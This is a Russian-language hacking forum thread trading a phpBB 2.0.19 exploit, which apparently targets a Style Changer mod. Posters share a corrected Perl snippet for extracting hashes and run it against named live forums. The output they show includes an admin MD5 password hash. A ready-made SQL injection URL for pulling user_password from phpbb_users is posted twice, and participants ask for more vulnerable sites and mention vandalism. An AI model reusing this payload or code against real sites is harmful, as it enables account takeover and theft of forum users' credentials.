![]() |
phpBB 2.0.19 Exploit
Окуеть уже до 19 дошли...
собственно вот линк _http://www.milw0rm.com/id.php?id=1469 а вот код Код:
#!/usr/bin/perl |
shto ta nefuric4it kak nado
C:\>c:\perl\bin\perl.exe c:\bb2.pl http://******* /forums/ 2 [+]Make Connection [+]Connected i sjo poslje etovo |
у кого пахало?Я около 15 пробовал не пашет пока
|
Я незнаю как сплоит, я вручную все делал, работает на ура, у кого руки растут от ушей посвещаеться вот вам форум бажный
http://www.phpbbhacks.com/templatesdemo/ http://www.extremepixels.net/phpbb/ да и ваще их полно в гугле, монстр респект |
да вручную всё прекрасно работает!)))
|
Работает на все 100% =)
|
У кого не работает, вы из форума копировали сплойт?
|
да)))
|
Ошибка В Exploit-е есть =)) Ну что парни кто не любит в Ручную ищите Ошибку в Скрипте =))
|
Всё работает на ура, всё нормально
|
о спасибо лимпопо, действительно ошибка =)))
вот быстренько исправил, у кого руки не из задницы поймут while ($hash = <$socket>){ $hash =~ m/open(.*?)template/ ; $pass=$1; } print "[+]User id: $id\n[+]Md5 Hash: $pass\n"; |
Рабочая верcия Выглядит так!
perl phpbb19.pl http://www.extremepixels.net /phpbb/ [+]Make Connection [+]Connected [+]User id: 2 [+]Md5 Hash: 12d187897ee09aa0900af90c29f0936c Вуаля =)) |
Вручную юзается хорошо. Но не везде работает=(
На многих форумах ничего не происходит=( |
Значит пропатчины или Другая версия phpbb
|
Видимо...
Но тестил на локал хосте. Версия 100% 2.0.19. Ничего не происходит. Никакие патчи вроде не ставлены. Версия оригинальная. На приведённых в топике форумах всё работает. Хм... Странновато малость. Или я ламмерю? |
ошибка же не в форуме а в моде
|
Люди, скажите пожалуйста, как его запустить на перле? У меня установлен ActivePerl 5.8.3
|
имхо, юзайте вручную, запарили ныть уже)))
|
zaivi d cmd -> i napishi perl lalala.pl
|
Вручную проще! Работает классно.
А он тока на 19 работает? |
Dron-anarchy походу тока на 19!а жаль)))
|
ну а вам какая разница нах?=)) тем более на многих стоит 19)) да действительно там ошыпка имхо могли бы и из линка взять тоже мине ) и за репу многим спасиБо+)
|
сорри скиньте в пм линк на бажный форум, для теста... :rolleyes:
|
Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/* |
причём, уберите пробелы лишние в запросе, когда писать его будете! Fr Om - это From! =)
|
все разобрался спасибо, но форумов маловато =(
|
За сплойт спасибки ручками юзается на отлично :d
Только реально я нарыл токо пару форумов которые ломаются а остальные никак! |
Inferno - Значит версии Другии =)) Рузами всегда хорошо работаеться =)) Чем бажными Скриптами =))
|
m0nzt3r спасибо за исправление ошибки)
|
Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
|
Цитата:
|
Цитата:
где ты здесь мод увидел ???? Может быть разные релизы phpBB 2.0.19 к примеру там за другой месяц или ещё что-то там но никак не уязвимость модов.... У меня трёт аж на ура.... |
Редкая кнешна бага, но всё ж работает. Молоца.
|
Цитата:
Цитата:
phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT :) Вот он и работает только там, где этот стайл ченджер установлен |
Врубился уже.
Мало где это стоит=( |
Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection [+]Connected [+]User id: 2 [+]Md5 Hash: пусто . Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет . |
Цитата:
Для справки: этот мод позволяет менять скин для форума прямо с главной страницы не заходя в настройки профиля. А вообще, как уже предлагали выше, пользуйся вручную Код HTML:
http://somesite/someforum/index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*Так что enjoy ;) |
Блин жаль что не везде работает! Покачто ещё не 1 форума не нашёл где стоит эта шляпа! :rolleyes:
|
Да уж не самый удачный сплойт для пхпбб,кста вышла новая пага-всем СМОТРЕТЬ
Думаю,что для неприятельского форума самое,то.Да и дырка будет еше долго жить) |
Интересный сплойт. Но только для вандализма =(.
Кроме мести ничего интересного. |
| Время: 10:47 |